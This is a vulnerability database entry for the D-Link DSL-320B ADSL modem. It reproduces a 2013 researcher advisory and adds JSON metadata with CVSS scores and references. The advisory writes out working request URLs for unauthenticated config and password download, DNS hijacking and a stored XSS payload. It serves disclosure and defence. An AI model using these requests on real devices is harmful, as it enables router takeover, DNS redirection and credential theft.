VAR-201305-0481
Vulnerability from variot - Updated: 2022-05-17 02:07The D-Link DSL-320B is an ADSL router device. Allowing remote attackers to exploit vulnerabilities to obtain sensitive information or cross-site scripting vulnerabilities can lead to the disclosure of sensitive information or hijacking sessions. D-Link DSL-320B is a modem product of Taiwan D-Link Corporation. D-Link DSL-320B has an HTML injection vulnerability and multiple information disclosure vulnerabilities. Attackers can use these vulnerabilities to disclose sensitive information; when a user browses an affected website, their browser will execute arbitrary code provided by the attacker and steal COOKIE-based authentication credentials in the context of the affected device. An HTML-injection vulnerability 2. This may aid in further attacks. Device: DSL-320B
Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010
Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem
============ Vulnerability Overview: ============
- Access to the Config file without authentication => full authentication bypass possible! :): (1)
192.168.178.111/config.bin
======= =======
=> sysPassword is Base64 encoded
-
Access to the logfile without authentication: (1) 192.168.178.111/status/status_log.sys
-
Change the DNS Settings without authentication: (1) http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2
-
Stored XSS within parental control (2):
=> Parameter: set/bwlist/entry:1/hostname
Request: http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1
Again you are able to place this XSS without authentication. :)
-
Login Credentials in HTTP GET are not a good idea => use HTTP Post! (3) http://192.168.178.111/login.xgi?user=admin&pass=admin1
-
Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!: (3) http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1
============ Solution ============
Update to firmware version 1.25:
(1) - fixed (2) - not fixed but authentication needed (3) - not fixed
============ Credits ============
The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de
============ Time Line: ============
17.03.2012 - discovered vulnerabilities 17.03.2013 - informed vendor about the vulnerabilities 25.04.2013 - tested beta version from vendor 30.04.2013 - vendor releases patch 06.05.2013 - public disclosure
===================== Advisory end =====================
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201305-0481",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dsl-320b",
"scope": null,
"trust": 1.2,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"db": "CNVD",
"id": "CNVD-2013-05000"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Michael Messner",
"sources": [
{
"db": "BID",
"id": "59665"
},
{
"db": "BID",
"id": "59659"
},
{
"db": "PACKETSTORM",
"id": "121526"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-118"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-117"
}
],
"trust": 1.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2013-04999",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-05000",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-04999",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2013-05000",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"db": "CNVD",
"id": "CNVD-2013-05000"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The D-Link DSL-320B is an ADSL router device. Allowing remote attackers to exploit vulnerabilities to obtain sensitive information or cross-site scripting vulnerabilities can lead to the disclosure of sensitive information or hijacking sessions. D-Link DSL-320B is a modem product of Taiwan D-Link Corporation. \nD-Link DSL-320B has an HTML injection vulnerability and multiple information disclosure vulnerabilities. Attackers can use these vulnerabilities to disclose sensitive information; when a user browses an affected website, their browser will execute arbitrary code provided by the attacker and steal COOKIE-based authentication credentials in the context of the affected device. An HTML-injection vulnerability\n2. This may aid in further attacks. Device: DSL-320B\n\nFirmware Version: EU_DSL-320B v1.23 date: 28.12.2010\n\nVendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem\n\n============ Vulnerability Overview: ============ \n\n* Access to the Config file without authentication =\u003e full authentication bypass possible! :): (1)\n\n192.168.178.111/config.bin\n\n===\u003csnip\u003e====\n\u003csysUserName value=\"admin\"/\u003e\n\u003czipb enable=\"1\"/\u003e\n\u003cdns dynamic=\"disable\" primary=\"1.1.1.1\" secondary=\"2.2.2.3\" domain=\"Home\" host=\"alpha\"/\u003e\n\u003csysPassword value=\"dGVzdA==\"/\u003e\n===\u003csnip\u003e====\n\n=\u003e sysPassword is Base64 encoded\n\n* Access to the logfile without authentication: (1)\n192.168.178.111/status/status_log.sys\n\n* Change the DNS Settings without authentication: (1)\nhttp://192.168.178.111/advanced/adv_dns.xgi?\u0026SET/dns/mode=0\u0026SET/dns/mode/server/primarydns=1.1.1.1\u0026SET/dns/mode/server/secondarydns=2.2.2.2\n\n* Stored XSS within parental control (2):\n\t\n\t=\u003e Parameter: set/bwlist/entry:1/hostname\n\t\nRequest:\nhttp://192.168.178.111/home/home_parent.xgi?\u0026set/bwlist/enable=1\u0026set/bwlist/bw_status=0\u0026set/bwlist/entry:1/bw_flag=0\u0026set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E\u0026set/bwlist/entry:1/weekday=6\u0026set/bwlist/entry:1/begintime=00:00\u0026set/bwlist/entry:1/endtime=23:59\u0026set/bwlist/entry:1/store=1\u0026set/bwlist/apply=1\n\nAgain you are able to place this XSS without authentication. :)\n\n* Login Credentials in HTTP GET are not a good idea =\u003e use HTTP Post! (3)\nhttp://192.168.178.111/login.xgi?user=admin\u0026pass=admin1\n\n* Credentials in HTTP GET via password change request are not a good idea =\u003e use HTTP Post!: (3)\nhttp://192.168.178.111/tools/tools_admin.xgi?\u0026set/sys/account/user/oldpwd=admin\u0026set/sys/account/user/password=test\u0026CMT=1\n\n============ Solution ============\n\nUpdate to firmware version 1.25:\n\n(1) - fixed\n(2) - not fixed but authentication needed\n(3) - not fixed\n\n============ Credits ============\n\nThe vulnerability was discovered by Michael Messner\nMail: devnull#at#s3cur1ty#dot#de\nWeb: http://www.s3cur1ty.de/advisories\nTwitter: @s3cur1ty_de\n\n============ Time Line: ============\n\n17.03.2012 - discovered vulnerabilities\n17.03.2013 - informed vendor about the vulnerabilities\n25.04.2013 - tested beta version from vendor\n30.04.2013 - vendor releases patch\n06.05.2013 - public disclosure\n\n===================== Advisory end =====================\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"db": "CNVD",
"id": "CNVD-2013-05000"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-118"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-117"
},
{
"db": "BID",
"id": "59665"
},
{
"db": "BID",
"id": "59659"
},
{
"db": "PACKETSTORM",
"id": "121526"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "59659",
"trust": 1.5
},
{
"db": "BID",
"id": "59665",
"trust": 1.5
},
{
"db": "PACKETSTORM",
"id": "121526",
"trust": 1.3
},
{
"db": "CNVD",
"id": "CNVD-2013-04999",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-05000",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201305-118",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201305-117",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"db": "CNVD",
"id": "CNVD-2013-05000"
},
{
"db": "BID",
"id": "59665"
},
{
"db": "BID",
"id": "59659"
},
{
"db": "PACKETSTORM",
"id": "121526"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-118"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-117"
}
]
},
"id": "VAR-201305-0481",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"db": "CNVD",
"id": "CNVD-2013-05000"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 1.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"db": "CNVD",
"id": "CNVD-2013-05000"
}
]
},
"last_update_date": "2022-05-17T02:07:15.073000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link DSL-320B has multiple patches for verifying bypassed vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/33852"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04999"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/121526/d-link-dsl-320b-authentication-bypass-cross-site-scripting.html"
},
{
"trust": 0.6,
"url": "http://www.dlink.com/"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/59659"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/59665"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/advisories"
},
{
"trust": 0.1,
"url": "http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem"
},
{
"trust": 0.1,
"url": "http://192.168.178.111/advanced/adv_dns.xgi?\u0026set/dns/mode=0\u0026set/dns/mode/server/primarydns=1.1.1.1\u0026set/dns/mode/server/secondarydns=2.2.2.2"
},
{
"trust": 0.1,
"url": "http://192.168.178.111/home/home_parent.xgi?\u0026set/bwlist/enable=1\u0026set/bwlist/bw_status=0\u0026set/bwlist/entry:1/bw_flag=0\u0026set/bwlist/entry:1/hostname=%22%3e%3cimg%20src=%220%22%20onerror=alert(1)%3e\u0026set/bwlist/entry:1/weekday=6\u0026set/bwlist/entry:1/begintime=00:00\u0026set/bwlist/entry:1/endtime=23:59\u0026set/bwlist/entry:1/store=1\u0026set/bwlist/apply=1"
},
{
"trust": 0.1,
"url": "http://192.168.178.111/tools/tools_admin.xgi?\u0026set/sys/account/user/oldpwd=admin\u0026set/sys/account/user/password=test\u0026cmt=1"
},
{
"trust": 0.1,
"url": "http://192.168.178.111/login.xgi?user=admin\u0026pass=admin1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"db": "CNVD",
"id": "CNVD-2013-05000"
},
{
"db": "BID",
"id": "59665"
},
{
"db": "BID",
"id": "59659"
},
{
"db": "PACKETSTORM",
"id": "121526"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-118"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-117"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"db": "CNVD",
"id": "CNVD-2013-05000"
},
{
"db": "BID",
"id": "59665"
},
{
"db": "BID",
"id": "59659"
},
{
"db": "PACKETSTORM",
"id": "121526"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-118"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-117"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"date": "2013-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-05000"
},
{
"date": "2013-05-06T00:00:00",
"db": "BID",
"id": "59665"
},
{
"date": "2013-05-06T00:00:00",
"db": "BID",
"id": "59659"
},
{
"date": "2013-05-06T15:13:57",
"db": "PACKETSTORM",
"id": "121526"
},
{
"date": "2013-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201305-118"
},
{
"date": "2013-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201305-117"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-04999"
},
{
"date": "2013-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-05000"
},
{
"date": "2013-05-06T00:00:00",
"db": "BID",
"id": "59665"
},
{
"date": "2013-05-06T00:00:00",
"db": "BID",
"id": "59659"
},
{
"date": "2013-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201305-118"
},
{
"date": "2013-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201305-117"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201305-118"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-117"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DSL-320B Multiple Authentication Bypass Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "59659"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-118"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "59665"
},
{
"db": "BID",
"id": "59659"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…